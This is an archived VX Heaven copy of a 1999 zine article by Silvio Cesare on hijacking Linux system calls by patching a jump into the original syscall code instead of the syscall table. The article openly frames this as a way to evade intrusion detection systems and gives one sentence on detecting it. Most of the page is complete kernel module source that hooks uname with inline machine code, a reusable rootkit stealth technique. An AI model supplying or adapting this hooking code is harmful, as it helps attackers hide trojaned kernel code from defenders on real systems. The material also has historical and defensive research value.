Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

SysCall redirection without modifying the SysCall table

Silvio Cesare
Matrix Zine [1]
1999

[Back to index] [Comments]

This article describes a technique of redirecting system calls without modifying the sys call table (implemented in Linux). This can be used to evade intrusion detection systems that use the sys call table to register redirected or trojaned system calls. It is however an easy modifcation to make to detect the attack implemented in this article. The basic premise behind this attack is to modify the old system call code to jump to the new system call, thus control is transferred to the replacement system call and the sys call table is left untouched. If this is the only procedure carried out, the old system call is left in a clobbered state, and is dangerous to execute, so the original code is saved and when the system call is made. The original code replaces the jump and the system call acts as normal. After this, the jump can then be inserted (overwritten) again waiting for the next use. Detecting this attack means that the first few bytes of the original system calls should be saved and then compared to verify that indeed the original system call is in place.

stealth_syscall.c (Linux 2.0.35)

#include <linux/config.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/utsname.h>
#include <linux/string.h>
#include <asm/string.h>
#include <asm/unistd.h>

#define SYSCALL_NR __NR_uname

static char syscall_code[7];
static char new_syscall_code[7] =
        "\xbd\x00\x00\x00\x00"  /*      movl   $0,%ebp  */
        "\xff\xe5"              /*      jmp    *%ebp    */
;

extern void *sys_call_table[];

void *_memcpy(void *dest, const void *src, int size)
{
        const char *p = src;
        char *q = dest;
        int i;

        for (i = 0; i < size; i++) *q++ = *p++;

        return dest;
}

/*
        uname
*/


int new_syscall(struct new_utsname *buf)
{
        printk(KERN_INFO "UNAME - Silvio Cesare\n");
        _memcpy(
                sys_call_table[SYSCALL_NR], syscall_code,
                sizeof(syscall_code)
        );
        ((int (*)(struct new_utsname *))sys_call_table[SYSCALL_NR])(buf);
        _memcpy(
                sys_call_table[SYSCALL_NR], new_syscall_code,
                sizeof(syscall_code)
        );
}

int init_module(void)
{
        *(long *)&new_syscall_code[1] = (long)new_syscall;
        _memcpy(
                syscall_code, sys_call_table[SYSCALL_NR],
                sizeof(syscall_code)
        );
        _memcpy(
                sys_call_table[SYSCALL_NR], new_syscall_code,
                sizeof(syscall_code)
        );
        return 0;
}

void cleanup_module(void)
{
        _memcpy(
                sys_call_table[SYSCALL_NR], syscall_code,
                sizeof(syscall_code)
        );
}
 
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua